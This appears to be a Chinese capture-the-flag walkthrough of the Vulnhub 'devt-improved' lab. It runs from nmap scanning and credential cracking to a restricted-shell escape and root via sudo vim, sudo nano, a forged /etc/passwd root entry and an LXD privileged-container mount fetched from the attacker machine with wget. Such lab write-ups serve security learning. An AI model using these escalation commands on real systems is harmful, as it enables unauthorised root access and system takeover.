信息收集
| IP Address | Opening Ports |
|---|---|
| 192.168.101.149 | TCP:22,113,139,445,8080 |
$ nmap -p- 192.168.101.149 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)
|_ 256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)
113/tcp open ident?
|_auth-owners: oident
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
|_auth-owners: root
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
|_auth-owners: root
8080/tcp open http-proxy IIS 6.0
|_http-server-header: IIS 6.0
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 15 Jul 2024 11:38:11 GMT
| Server: IIS 6.0
| Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT
| ETag: "230-57de32091ad69"
| Accept-Ranges: bytes
| Content-Length: 560
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <html>
| <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
| </head>
| <body>
| <p>Welcome to the Development Page.</p>
| <br/>
| <p>There are many projects in this box. View some of these projects at html_pages.</p>
| <br/>
| <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to [email protected].</p>
| <br/>
| <br/>
| <br/>
| <hr>
| <i>Powered by IIS 6.0</i>
| </body>
| <!-- Searching for development secret page... where could it be? -->
| <!-- Patrick, Head of Development-->
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 15 Jul 2024 11:38:11 GMT
| Server: IIS 6.0
| Allow: GET,POST,OPTIONS,HEAD
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Mon, 15 Jul 2024 11:38:11 GMT
| Server: IIS 6.0
| Content-Length: 294
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>IIS 6.0 Server at 192.168.101.149 Port 8080</address>
|_ </body></html>
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!
|_http-open-proxy: Proxy might be redirecting requests
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=7/15%Time=66950A23%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,330,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2015\x20Jul\x202
SF:024\x2011:38:11\x20GMT\r\nServer:\x20IIS\x206\.0\r\nLast-Modified:\x20W
SF:ed,\x2026\x20Dec\x202018\x2001:55:41\x20GMT\r\nETag:\x20\"230-57de32091
SF:ad69\"\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x20560\r\nVary:\x2
SF:0Accept-Encoding\r\nConnection:\x20close\r\nContent-Type:\x20text/html\
SF:r\n\r\n<html>\r\n<head><title>DEVELOPMENT\x20PORTAL\.\x20NOT\x20FOR\x20
SF:OUTSIDERS\x20OR\x20HACKERS!</title>\r\n</head>\r\n<body>\r\n<p>Welcome\
SF:x20to\x20the\x20Development\x20Page\.</p>\r\n<br/>\r\n<p>There\x20are\x
SF:20many\x20projects\x20in\x20this\x20box\.\x20View\x20some\x20of\x20thes
SF:e\x20projects\x20at\x20html_pages\.</p>\r\n<br/>\r\n<p>WARNING!\x20We\x
SF:20are\x20experimenting\x20a\x20host-based\x20intrusion\x20detection\x20
SF:system\.\x20Report\x20all\x20false\x20positives\x20to\x20patrick@goodte
SF:ch\.com\.sg\.</p>\r\n<br/>\r\n<br/>\r\n<br/>\r\n<hr>\r\n<i>Powered\x20b
SF:y\x20IIS\x206\.0</i>\r\n</body>\r\n\r\n<!--\x20Searching\x20for\x20deve
SF:lopment\x20secret\x20page\.\.\.\x20where\x20could\x20it\x20be\?\x20-->\
SF:r\n\r\n<!--\x20Patrick,\x20Head\x20of\x20Development-->\r\n\r\n</html>\
SF:r\n")%r(HTTPOptions,A6,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2015\x
SF:20Jul\x202024\x2011:38:11\x20GMT\r\nServer:\x20IIS\x206\.0\r\nAllow:\x2
SF:0GET,POST,OPTIONS,HEAD\r\nContent-Length:\x200\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html\r\n\r\n")%r(RTSPRequest,1CD,"HTTP/1\.1\x2
SF:0400\x20Bad\x20Request\r\nDate:\x20Mon,\x2015\x20Jul\x202024\x2011:38:1
SF:1\x20GMT\r\nServer:\x20IIS\x206\.0\r\nContent-Length:\x20294\r\nConnect
SF:ion:\x20close\r\nContent-Type:\x20text/html;\x20charset=iso-8859-1\r\n\
SF:r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//EN\">
SF:\n<html><head>\n<title>400\x20Bad\x20Request</title>\n</head><body>\n<h
SF:1>Bad\x20Request</h1>\n<p>Your\x20browser\x20sent\x20a\x20request\x20th
SF:at\x20this\x20server\x20could\x20not\x20understand\.<br\x20/>\n</p>\n<h
SF:r>\n<address>IIS\x206\.0\x20Server\x20at\x20192\.168\.101\.149\x20Port\
SF:x208080</address>\n</body></html>\n");
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2024-07-15T11:39:41
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: development
| NetBIOS computer name: DEVELOPMENT\x00
| Domain name: \x00
| FQDN: development
|_ System time: 2024-07-15T11:39:41+00:00
枚举
http://192.168.101.149:8080/
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图](https://img.4awl.net/img/28/5e25fa73b818bb86c0627453331e53.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图")
http://192.168.101.149:8080/html_pages
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图1](https://img.4awl.net/img/60/0a61c5347f49bf76a9f64f6579a0cf.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图1")
http://192.168.101.149:8080/development.html
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图2](https://img.4awl.net/img/5a/dad6ea85b6d5c985d13bc66326697b.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图2")
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图3](https://img.4awl.net/img/66/ec93b1e3abd22da3e807f622da8eb9.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图3")
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图4](https://img.4awl.net/img/b6/ad313cf61dbbcbf49e6db2a50d7d52.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图4")
http://192.168.101.149:8080/developmentsecretpage/patrick.php?logout=1
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图5](https://img.4awl.net/img/23/14a1258750c5f268ff8ac001f814e2.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图5")
username:adminpassword:1234
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图6](https://img.4awl.net/img/a6/6b8a12abc5ce1b5221e864630d2123.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图6")
Exploit-db 上发现了一个名为/[path]/slog_users.txt的漏洞,该漏洞容易受到 RFI 的影响。请参阅 CVE 代码:2008-5762/63。
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图7](https://img.4awl.net/img/27/0e5b9dedd6c8457977fd17e81f9fad.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图7")
http://192.168.101.149:8080/developmentsecretpage/slog_users.txt
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图8](https://img.4awl.net/img/77/73eb287b672145319817d4df162993.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图8")
$ hashcat -m 0 -a 0 '4a8a2b374f463b7aedbb44a066363b81' /usr/share/wordlists/rockyou.txt
username:internpassword:12345678900987654321
username:patrickpassword:P@ssw0rd25
username:qiupassword:qiu
本地权限
$ ssh [email protected]
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图9](https://img.4awl.net/img/37/42ca812e8c72df8d08a131be680d93.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图9")
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图10](https://img.4awl.net/img/37/afa8bf79496e227c0e96df22a7489b.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图10")
$ echo os.system("/bin/bash")
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图11](https://img.4awl.net/img/6f/9966edf7f140331fc9066cdff3cf4e.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图11")
Local.txt 截屏
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图12](https://img.4awl.net/img/05/ef7c50de191c365941c0f092fe3bc8.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图12")
Local.txt 内容
Congratulations on obtaining a user shell. 🙂
权限提升
vim 提权
intern@development:~$ cat work.txt
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图13](https://img.4awl.net/img/ba/6e75376aed4f93d42eb65f6a399ef9.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图13")
intern@development:/tmp$ su patrick
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图14](https://img.4awl.net/img/6a/bff1a7fc88723a1ec6e56285bdcf7f.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图14")
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图15](https://img.4awl.net/img/b3/aeea660d83e9c37321bbcb89f78429.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图15")
patrick@development:~$ sudo /usr/bin/vim
:set shell=/bin/bash:shell
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图16](https://img.4awl.net/img/dd/8a690d5bf7041b6fb8e07336e61a6f.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图16")
nano 提权
patrick@development:~$ sudo nanopatrick@development:~$ ^R^Xpatrick@development:~$ reset; sh 1>&0 2>&0
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图17](https://img.4awl.net/img/ed/651862e400b04ecbafe65dde2d0a12.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图17")
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图18](https://img.4awl.net/img/0a/5072dc744c95891d727aabec4548cd.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图18")
/etc/passwd 提权
patrick@development:~$ openssl passwd -1 -salt maptnh opopop
$1$maptnh$ItUNUP3HGbsfXKvpOJ58V.
maptnh:$1$maptnh$ItUNUP3HGbsfXKvpOJ58V.:0:0:root:/root:/bin/bash
patrick@development:~$ sudo vim /etc/passwd
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图19](https://img.4awl.net/img/d8/4ecb2b5c1a8f9ddbbad03a6a49cd8d.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图19")
patrick@development:~$ su maptnh
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图20](https://img.4awl.net/img/91/8d873072c961adf58430b9f8b869ae.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图20")
lxc 提权
(kali)$ git clone https://github.com/saghul/lxd-alpine-builder.git
(kali)$ cd lxd-alpine-builder
构建包
(kali)$ sudo ./build-alpine
(kali)$ python3 -m http.server 10035
patrick@development:/tmp$wget http://192.168.101.128/alpine-v3.20-x86_64-20240712_0618.tar.gz
patrick@development:/tmp$ lxc image import /tmp/alpine-v3.20-x86_64-20240712_0618.tar.gz --alias test
patrick@development:/tmp$ lxc image list
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图21](https://img.4awl.net/img/05/7f4e19eea53aabe73c779c93c78e4d.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图21")
patrick@development:/tmp$ lxc init test ignite -c security.privileged=true -s default
patrick@development:/tmp$ lxc config device add ignite test disk source=/ path=/mnt/root recursive=true
patrick@development:/tmp$ lxc start ignite
patrick@development:/tmp$ lxc exec ignite /bin/sh
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图22](https://img.4awl.net/img/67/02b55b11dc2a893215cbd2d189ecc7.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图22")
Proof.txt 截屏
![[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图23](https://img.4awl.net/img/e3/6dfe3399bb8240c02da1dcb715024c.jpg "[Vulnhub] devt-improved slog_users+vim权限提升+nano权限提…插图23")
Proof.txt 内容
Congratulations on rooting DEVELOPMENT! 🙂
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
